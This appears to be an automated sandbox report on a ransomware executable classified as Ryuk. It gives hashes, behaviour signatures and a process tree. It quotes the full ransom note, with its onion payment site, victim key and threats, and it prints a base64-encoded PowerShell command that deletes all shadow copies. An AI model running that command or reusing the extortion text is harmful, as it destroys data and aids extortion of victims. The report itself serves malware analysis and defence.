Analysis

  • max time kernel
    140s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:18

General

  • Target

    b02617d6947e1ef032caac0a8ecd545506723e811748d8d3eaf4f57f2848dcce.exe

  • Size

    114KB

  • MD5

    93fb851a430ba2d09281cc7a20173f4a

  • SHA1

    67a87885d9830a35ca1cb29bc8de28590c12897d

  • SHA256

    b02617d6947e1ef032caac0a8ecd545506723e811748d8d3eaf4f57f2848dcce

  • SHA512

    bbdbf6278ed9dde34d105f12b0ef298c23e3b68172fefd4dd50a451dae380f43d058e0546423044cb621bb6d3a0d60c25fd41f776efa5f53e4c9e0b11462f763

Score
10/10

Malware Config

Extracted

Path

C:\m553pdt183-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension m553pdt183. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7952412F84482DF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A7952412F84482DF Warning: secondary website can be blocked, thats why first variant much better and more available. If you have problem with connect, use strictly TOR version 8.5.5 link for download TOR version 8.5.5 here: https://filehippo.com/download_tor_browser_for_windows/ When you open our website, put the following data in the input form: Key: wNh10llarvrTMnQfI456TPhvWHOYduQHHTfEMEcfsmWk4pZqJI4HNZR5ofDSOxLp AqelIhiCuENlpz9zZQqMME4iMZNZXrn0JoeAO7oK3Flrm3Mh6JPsMCl/3IGOCBmj Qac3CYhm3uHGIlOuBUy8Ff6ihrvD1tLrhHdd5ef3pM8giCtPXKulHfIMrUQGfFGl gUvG6UvMxrjX7TWDtzfOKFf459kjLrf6YnfuMkd1v7maBW1pSb7RO9np1ndqPsVs rD3Kic8qVHQkg10zpyfrw7iK56r3k4e1Lbqh0P17eKGPgeEpCaWMNsTP+kGknOya PLKIB00AA2attiRQ/FxIItgPKScTD0oul3BEPHpak/6RUqicn+dLrsautG179DN6 vidziR1+SJpzKRxPI3y4MS9TPT3RyTGcHvG2exABYCPd2YPoUGa/EmBFrQ2DkhNc 5K/Gmp4E6bZYf3NctuO7+r9UwDL2Bc/Wuz18TungLxflBsfL2hQpr4QdX/neVNHw DPfB/Q4j/b5Um/tAGwmGtvZR7c2cYoYBHnewOIhutSxYuzubaOC6PaT9NLZ7R9eb QBrXdrxvdWLtP7uV5Ph/Vk4G+UG/3f9ioOYxaoOG8eXf5LQOQwgPVwX21qXWUidg WWIZuRE+kKVJxuj/xv18tAuViNjHmxuAXsCoWdbH7X1ssVhFsmJzMNyK12C/iKqm SRtHO089jJRIlI2chCO+f0QlTWpmC3C1IG3s3qEKIYsOIjHSYVSxBMVqm5n4pgoG Mjo/SLCCOf6wA6JZ1Bn4Bjtopq2RxN3f5pX4j9tUFY06AyOkEAI6KrXWsgjU7tXY hhMfWliXGCnVYgiNLgYTVbPY3cQQx52TcBnRvxEOX+7GWxqgRkU/lvSiQvwXdSlN Va1pLUDRT+fNDXUdSqjMv4ViVAWzBdoF2QAKUYt8vHmK/VE5DYjS5Ym8p4ha3GT7 RpQlsw+utRElsWSUe0cpiNB3QCRUdL9c4p2da0P5+lwvuKjBJfqw9TONcEmvBZId kEX8TLstAJWeaGiwQV1n4PohkwZANvL6X2XCiy0x0EwPrPCAVqN83DIIR78RMnMW pD2UlyYgxpyn3hDlACe+3isD+YkKD8riIATNuxIHX31dnzvCfrm7nQfZ2sbxQSI8 f7FmH8qTgBpk/dTWk2UkEZDOKXsatdn6zLLayTSJVaZR56BWSTyFL159N8AB+a4q 4b6igcM/HZ4b5BPX3aQKygfcrnNyTFDrr9rCZjZXUnJAkDU6wns6ENIWA3f451ly BLju8ziLiSxgzfd0zvkqJfJGNEFRxpknDZ6Ak9p9r5Q= Extension name: m553pdt183 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7952412F84482DF

http://decryptor.cc/A7952412F84482DF

https://filehippo.com/download_tor_browser_for_windows/

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b02617d6947e1ef032caac0a8ecd545506723e811748d8d3eaf4f57f2848dcce.exe
    "C:\Users\Admin\AppData\Local\Temp\b02617d6947e1ef032caac0a8ecd545506723e811748d8d3eaf4f57f2848dcce.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:828
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1848
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1780

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/828-55-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp

      Filesize

      8KB

    • memory/828-56-0x000007FEF2D90000-0x000007FEF38ED000-memory.dmp

      Filesize

      11.4MB

    • memory/828-57-0x0000000002910000-0x0000000002912000-memory.dmp

      Filesize

      8KB

    • memory/828-58-0x0000000002912000-0x0000000002914000-memory.dmp

      Filesize

      8KB

    • memory/828-59-0x0000000002914000-0x0000000002917000-memory.dmp

      Filesize

      12KB

    • memory/828-60-0x000000000291B000-0x000000000293A000-memory.dmp

      Filesize

      124KB

    • memory/968-54-0x0000000075B51000-0x0000000075B53000-memory.dmp

      Filesize

      8KB